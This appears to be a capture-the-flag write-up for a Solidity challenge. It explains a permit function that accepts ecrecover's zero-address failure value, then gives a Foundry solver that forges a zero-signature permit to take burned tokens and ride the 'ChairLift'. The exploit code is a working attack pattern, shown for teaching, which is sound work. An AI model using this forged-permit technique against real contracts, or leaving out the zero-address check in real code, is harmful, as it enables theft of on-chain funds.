## Weakness

The introduced contract uses the permit technique to allow the liquidity holder to sign the parameters and pass them to the interested party.
The interested party invokes the contract with these parameters by sponsoring the invocation of the contract.
In Solidity, when verifying the signature, ecrecover is used to retrieve the address of the signer. In case of an error, ecrecover returns 0x0000000000000000000000000000000000000000.
This same address is commonly used as the address to be burned.
The weakness of the contract is that by using no check on the null address, it is easy to pick up the burnt/deleted balance.

## Exploit

```solidity
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.13;

import "forge-ctf/CTFSolver.sol";
import "forge-std/console.sol";
import "src/Setup.sol";

contract Solve is CTFSolver {
function solve(address challenge, address player) internal override {
Setup setup = Setup(challenge);
vm.label(address(setup), "Setup");
ChairLift chairLift = setup.TARGET();
Ticket ticket = chairLift.ticket();
vm.label(address(chairLift), "ChairLift");
vm.label(address(ticket), "Ticket");
console.log("ChairLift tripsTaken", chairLift.tripsTaken());
ticket.transferWithPermit(address(0), player, 0, 10000000000000, 1, bytes32(uint256(0)), bytes32(uint256(0)));
chairLift.takeRide(0);
console.log("ChairLift tripsTaken", chairLift.tripsTaken());
}
}
```